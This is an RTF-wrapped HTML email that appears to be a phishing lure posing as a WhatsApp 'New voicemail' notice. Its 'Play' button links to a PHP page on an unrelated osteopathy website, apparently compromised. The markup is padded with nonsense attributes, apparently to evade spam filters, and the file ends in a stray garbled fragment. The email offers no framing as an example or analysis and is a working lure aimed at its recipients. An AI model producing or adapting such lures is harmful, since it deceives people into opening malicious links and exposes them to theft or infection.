{\rtf1\ansi\ansicpg1252\fromhtml1 \fbidis \deff0{\fonttbl
{\f0\fswiss\fcharset0 Arial;}
{\f1\fmodern Courier New;}
{\f2\fnil\fcharset2 Symbol;}
{\f3\fmodern\fcharset0 Courier New;}}
{\colortbl\red0\green0\blue0;\red0\green0\blue255;}
\uc1\pard\plain\deftab360 \f0\fs24 
{\*\htmltag19 <html>}
{\*\htmltag34 <head>}
{\*\htmltag1 \par }
{\*\htmltag41 </head>}
{\*\htmltag2 \par }
{\*\htmltag50 <body fortunate="38" style="background:#393e43;padding:20px;">}
{\*\htmltag240   }
{\*\htmltag96 <div multiplicatives="1" style="max-width:680px;">}\htmlrtf {\htmlrtf0 
{\*\htmltag240   }
{\*\htmltag96 <table width="100%" cellspacing="0" cellpadding="10" border="0">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag240     }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag0 \par }
{\*\htmltag240     }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr byronism="7">}\htmlrtf {\htmlrtf0 
{\*\htmltag84     }
{\*\htmltag148 <td rolling="54" style="background:#26252a;border-bottom:solid 10px #34af23;padding:20px;">}\htmlrtf {\htmlrtf0 
{\*\htmltag84   }
{\*\htmltag4 \par }
{\*\htmltag84   }
{\*\htmltag4 \par }
{\*\htmltag84      }\htmlrtf }\htmlrtf0 \htmlrtf}\htmlrtf0

{\*\htmltag96 <table cellspacing="0" cellpadding="0" border="0">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag64 <tr doleful="59">}\htmlrtf {\htmlrtf0 
{\*\htmltag148 <td telephonic="1" style="font-family:arial;font-weight:bold;font-size:30px;color:#ffffff;">}\htmlrtf {\htmlrtf0 WhatsApp
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag240     }
{\*\htmltag248 </td>}
{\*\htmltag240    }
{\*\htmltag72 </tr>}
{\*\htmltag0  }
{\*\htmltag0 \par }
{\*\htmltag240    }
{\*\htmltag0 \par }
{\*\htmltag240     }
{\*\htmltag0 \par }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr pythagoras="87">}\htmlrtf {\htmlrtf0 
{\*\htmltag84     }
{\*\htmltag148 <td victuals="26" style="background:#ffffff;font-family:arial;font-weight:normal;font-size:14px;color:#333333;">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag4  }\htmlrtf }\htmlrtf0 \htmlrtf}\htmlrtf0

{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 
{\*\htmltag112 <br>}\htmlrtf \par
\htmlrtf0 
{\*\htmltag96 <table cellspacing="0" cellpadding="0" border="0" align="center">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag240    }
{\*\htmltag0 \par }
{\*\htmltag240    }
{\*\htmltag0 \par }
{\*\htmltag0 \par }
{\*\htmltag0  }
{\*\htmltag0 \par }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag148 <td inject="paws" style="font-family:arial;font-weight:bold;font-size:22px;color:#808080;">}\htmlrtf {\htmlrtf0 New voicemail.
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0  }
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag112 <br>}\htmlrtf \par
\htmlrtf0 
{\*\htmltag0  }
{\*\htmltag0 \par }
{\*\htmltag240    }
{\*\htmltag0 \par }
{\*\htmltag96 <div style="color:#40a9d8;">}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 Information{\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag112 <br>}\htmlrtf \par
\htmlrtf0 
{\*\htmltag0  }
{\*\htmltag96 <div style="padding-left:30px;">}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 Nov 21 5:31 PM
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 07 sec{\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag240     }
{\*\htmltag248 </td>}
{\*\htmltag240   }
{\*\htmltag0 \par }
{\*\htmltag240    }
{\*\htmltag0 \par }
{\*\htmltag240    }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag0 \par }
{\*\htmltag240     }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag72 </tr>}
{\*\htmltag240    }
{\*\htmltag64 <tr devotion="byronism">}\htmlrtf {\htmlrtf0 
{\*\htmltag4  }
{\*\htmltag4 \par }
{\*\htmltag84    }
{\*\htmltag4 \par }
{\*\htmltag84    }
{\*\htmltag4 \par }
{\*\htmltag84    }
{\*\htmltag148 <td style="background:#ffffff;text-align:center;padding:20px;">}\htmlrtf {\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag84       }
{\*\htmltag84 <a pessimist="37" href="http://www.annecy-osteopathie.com/osteopathe/sacrificers.php" style="border-radius:20px 20px 20px 20px;padding:5px 40px 5px 40px;background:#67bb34;color:#ffffff;text-decoration:none;font-family:arial;font-weight:bold;font-size:30px;">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://www.annecy-osteopathie.com/osteopathe/sacrificers.php"}}{\fldrslt\cf1\ul \htmlrtf0 Play\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag4  }
{\*\htmltag4 \par }
{\*\htmltag84    }
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag84    }\htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0  }
{\*\htmltag0 \par }
{\*\htmltag240     }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag4 \par }
{\*\htmltag4 \par }
{\*\htmltag84   }
{\*\htmltag4 \par }
{\*\htmltag4  }
{\*\htmltag4 \par }
{\*\htmltag84    }
{\*\htmltag148 <td style="background:#d9d9d9;font-family:arial;font-weight:normal;font-size:11px;color:#808080;">}\htmlrtf {\htmlrtf0 \'a9 Whats App
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag84    }\htmlrtf  \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag240   }
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag240   }
{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag0 \par }
{\*\htmltag0  }
{\*\htmltag0 \par }
{\*\htmltag240    }
{\*\htmltag0 \par }
{\*\htmltag0  }
{\*\htmltag58 </body>}
{\*\htmltag242   }
{\*\htmltag2 \par }
{\*\htmltag27 </html>}
{\*\htmltag3  }
{\*\htmltag3 \par }
{\*\htmltag243   }
{\*\htmltag3 \par }
{\*\htmltag243     }
{\*\htmltag3 \par }
{\*\htmltag3 \par }}{f1e
09 3
